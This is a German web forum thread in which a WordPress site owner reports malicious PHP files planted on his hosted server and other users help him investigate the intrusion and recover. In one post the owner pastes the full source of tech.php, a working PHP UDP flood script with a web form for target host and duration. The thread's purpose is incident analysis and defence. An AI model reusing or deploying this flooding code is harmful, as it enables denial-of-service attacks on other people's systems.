"malicious scripts" auf Webserver aufgetaucht tech.php+0x.php

**chunic** · 08. 02. 2012, 16:52

Hallo ihr Räuber,

Ich habe seit einiger Zeit Webspace gemietet und betreibe eine kleine Homepage (hauptsächlich ein Wordpress) darauf.
Heute kam von meinem Anbieter (namecheap) es wären "malicious scripts" auf dem Server gefunden worden.

Die Dateien heißen sind:
/home/*username*/public_html/wp-content/tech.php
/home/*username*/public_html/wp-content/0x.php

Da leider alles erstmal gesperrt wurde komme ich nicht erstmal nicht an den Inhalt der Dateien.
Wollte allerdings schonmal fragen ob jemand von euch eine Idee hat was das ist, wo das herkommt?
ich halte Wordpress immer auf dem neusten Stand, auch meine Passwörter sollten
eigentlich der gebotenen Sicherheit entsprechen.

vielen dank soweit

**Kugelfisch23** · 08. 02. 2012, 19:18

Ohne spezifischere Informationen kann man über die genauen Ursachen nur mutmassen. Denkbar wäre natürlich eine Schwachstelle auf dem Webserver deines Hosters - dies würde jedoch viele Websites betreffen, so dass mir diese Möglichkeit eher unwahrscheinlich scheint. Wahrscheinlicher scheint mir, dass deine Zugangsdaten in falsche Hände gelangt sind. Hast du die genutzten Passwörter eventuell mehrfach verwendet? Dich von fremden System aus eingeloggt? Bist du dir sicher, dass dein eigenes System nicht kompromittiert ist?

**chunic** · 08. 02. 2012, 22:30

So, ich habe nun wieder Zugang zum Server.
Die Dateien scheinen UDP Flood scripts zu sein.
Ich weiß nicht ob ich den Inhalt hier posten darf?!

Ich habe sie definitiv nicht auf den Server geholt.
Meine Maßnahmen wären nun eigentlich erstmal ftp und adminpasswort für den cpanel Zugang zu ändern. Weitere Vorschläge?

Ich sehe nun gerade, dass in erstaunlich häufigen Abständen eine IP versucht auf die eben gelöschten Dateien zuzugreifen.

**Kugelfisch23** · 08. 02. 2012, 22:44

Zitat von chunic

Ich weiß nicht ob ich den Inhalt hier posten darf?!

Das ist kein Problem und wäre insbesondere dann, wenn du nicht ausschliessen kannst, dass der Inhalt Rückschlüsse auf den Infektionsweg zulässt, sogar hilfreich für eine Analyse.

Zitat von chunic

Meine Maßnahmen wären nun eigentlich erstmal ftp und adminpasswort für den cpanel Zugang zu ändern. Weitere Vorschläge?

Zunächst solltest du ausschliessen, dass dein lokales System kompromittiert ist - siehe dazu http://board.gulli.com/thread/15222...2#post12551252. Andernfalls werden deine neu gesetzten Zugangsdaten möglicherweise gleich wieder abgegriffen. Ausserdem solltest du den gesamten Datenbestand deiner Website löschen (ggf. nach einer Sicherung zur späteren Analyse) und durch ein sauberes Backup ersetzen. Bedenke, dass möglicherweise Hintertüren eingebaut wurden.

**chunic** · 08. 02. 2012, 22:51

Hier mal der Inhalt der tech.php, die seit einiger Zeit ständig versucht wird aufzurufen:

Spoiler:

<html>

<body>

<font color="45acf6">

<STYLE>

input{

background-color: #45acf6; font-size: 8pt; color: black; font-family: Tahoma; border: 1 solid #66;

}

button{

background-color: #45acf6; font-size: 8pt; color: black; font-family: Tahoma; border: 1 solid #66;

}

body {

background-color: #101010;

}

</style>

<br>

<p>

<br>

<p>

<center>

<?php

//UDP

if(isset($_GET['host'])&&isset($_GET['time'])){

$packets = 0;

ignore_user_abort(TRUE);

set_time_limit(0);

$exec_time = $_GET['time'];

$time = time();

//print "Started: ".time('d-m-y h:i:s')."<br>";

$max_time = $time+$exec_time;

$host = $_GET['host'];

for($i=0;$i<65000;$i++){

$out .= 'X';

}

while(1){

$packets++;

if(time() > $max_time){

break;

}

$rand = rand(1,65000);

$fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);

if($fp){

fwrite($fp, $out);

fclose($fp);

}

}

echo "<b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n";

echo '<br><br>

<form action="'.$surl.'" method=GET>

<input type="hidden" name="act" value="phptools">

Host: <br><input type=text name=host><br>

Length (seconds): <br><input type=text name=time><br>

<input type=submit value=Go></form>';

}else{ echo '<br><b>UDP Flood</b><br>

<form action=? method=GET>

<input type="hidden" name="act" value="phptools">

Host: <br><input type=text name=host value=><br>

Length (seconds): <br><input type=text name=time value=><br><br>

<input type=submit value=Go></form>';

}

?>

</center>

Techie

</body>

</html>

Ein Scan mit Hijackthis ergab nichts, ich halte es auch für äußerst unwahrscheinlich, dass mein System sich was eingefangen hat.

So, alle alten Dateien gelöscht und ein Backup aufgespielt, zum Glück ist Wordpress recht gutmütig, was sowas angeht, außerdem alle passwörter geändert.

Achja, mir fiel gerade ein, dass vor einiger Zeit ich mein Adminpasswort zurücksetzen musste, da das alte nicht mehr funktionierte, könnte es sein, dass der Angreifer es i.-wie geschafft hat Zugang zu meiner Wordpressdatenbank bekommen hat, sich da ein neues Passwort gegeben hat und dann über Wordpress die beiden Dateien hochgeladen hat?

**Kugelfisch23** · 09. 02. 2012, 01:33

Zitat von chunic

Ein Scan mit Hijackthis ergab nichts, ich halte es auch für äußerst unwahrscheinlich, dass mein System sich was eingefangen hat.

Hast du auch einen Scan von einem separaten Betriebssystem aus durchgeführt, wie im verlinkten Leitfaden empfohlen? Bedenke, dass sich bereits aktive Malware ggf. über ein Rootkit tarnen oder Malware-Scanner manipulieren kann.

Zitat von chunic

Achja, mir fiel gerade ein, dass vor einiger Zeit ich mein Adminpasswort zurücksetzen musste, da das alte nicht mehr funktionierte, könnte es sein, dass der Angreifer es i.-wie geschafft hat Zugang zu meiner Wordpressdatenbank bekommen hat, sich da ein neues Passwort gegeben hat und dann über Wordpress die beiden Dateien hochgeladen hat?

Das ist durchaus denkbar, zumal WordPress in der Standardkonfiguration in verschiedenen Situationen (u.a. zum Installieren von Plugins, Themen oder Updates) Schreibzugriff für das eigene Verzeichnis verlangt, entweder direkt oder über FTP. War deine WordPress-Installation in der Vergangenheit immer aktuell? Nutzt du Plugins/Erweiterungen Dritter?

**chunic** · 09. 02. 2012, 15:23

Zitat von Kugelfisch23

Das ist durchaus denkbar, zumal WordPress in der Standardkonfiguration in verschiedenen Situationen (u.a. zum Installieren von Plugins, Themen oder Updates) Schreibzugriff für das eigene Verzeichnis verlangt, entweder direkt oder über FTP. War deine WordPress-Installation in der Vergangenheit immer aktuell? Nutzt du Plugins/Erweiterungen Dritter?

Also höchstens für ein paar Tage nicht, da WP ja selbst darauf hinweist, dass es ein neues update gibt und ich das dann sofort ausgeführt habe.

Habe in den Zugriffs und Errorlogs gesehen, dass jemand scheinbar nach PMA gesucht hat, außerdem taucht immer wieder www.hackforums.net als referrer auf.

Lohnt sich eigentlich eine Anzeige? Frage vor allem deswegen weil seit gestenr immer und immer wieder eine IP versucht das script auszuführen...

**Kugelfisch23** · 09. 02. 2012, 17:26

Zitat von chunic

Habe in den Zugriffs und Errorlogs gesehen, dass jemand scheinbar nach PMA gesucht hat, außerdem taucht immer wieder www.hackforums.net als referrer auf.

Möglicherweise hat jemand einen automatischen Schwachstellen-Scanner (Acunetix, AppScan, Hailstorm, NTOSpider, ...) gegen deine Website eingesetzt. Solche Werkzeuge lassen sich nicht nur zum Finden von Schwachstellen eigener Webanwendungen einsetzen, sondern auch von Angreifern zum Auffinden von Schwachstellen einer fremden Website missbrauchen. Alternativ könnte es sich um einen schlichten Zufall oder eine gezielte Erzeugung unsinniger Log-Einträge handeln, um den wahren Angriffsvektor zu tarnen.

Interessant wäre, wie genau der Angreifer Zugriff auf deine Site erhalten hat. Überprüfe auch die FTP-Logs, ob dort eventuell ein verdächtiger Zugriff auftaucht. Wenn du noch andere Protokolle zur Administration einsetzt (z.B. SSH), überprüfe auch diese Logs. Erst dann, wenn du die Ursache genau kennst, kannst du auch Gegenmassnahmen ergreifen, damit das in Zukunft nicht mehr geschieht.

Zitat von chunic

Lohnt sich eigentlich eine Anzeige? Frage vor allem deswegen weil seit gestenr immer und immer wieder eine IP versucht das script auszuführen...

Du kannst natürlich Anzeige gegen unbekannt erstatten. Ob sie zum Erfolg bzw. zur Auffindung des Angreifers führt, hängt entscheidend davon ob, wie gut er sich selbst geschützt hat. Im ungünstigsten Fall führt die IP-Adresse bloss zu einem Anonymisierungsdienst oder einem kompromittierten Privatsystem.

**Tropi** · 10. 02. 2012, 00:28

Zitat von chunic

Habe in den Zugriffs und Errorlogs gesehen, dass jemand scheinbar nach PMA gesucht hat,

PMA ist u.a. ein Kürzel für das Datenbanktool phpMyAdmin. Läuft das bei dir? Ist die Version aktuell? Ein Einstieg in die Datenbank wäre bei einem geknackten phpMyAdmin ja ein leichtes.

**chunic** · 10. 02. 2012, 14:07

Zitat von Tropi

PMA ist u.a. ein Kürzel für das Datenbanktool phpMyAdmin. Läuft das bei dir? Ist die Version aktuell? Ein Einstieg in die Datenbank wäre bei einem geknackten phpMyAdmin ja ein leichtes.

Jap, das weiß ich, allerdings hat der Anbieter die Hand über PMA.
Also ich habe nun seit gestern ständig die Nase in sämtlichen Logs allerdings keine Anhaltspunkte für die Tür gefunden, die genutzt wurde.
Da allerdings mir unbekannte IPs versuchen sich über das normale WP-Adminlogin einzuloggen(und scheitern) gehe ich derzeit von einem nicht sonderlich ausgefeilten Angriff aus.
Ich werde die Augen offen halten und mich wieder melden, wenn sich was neues ergibt.

Danke soweit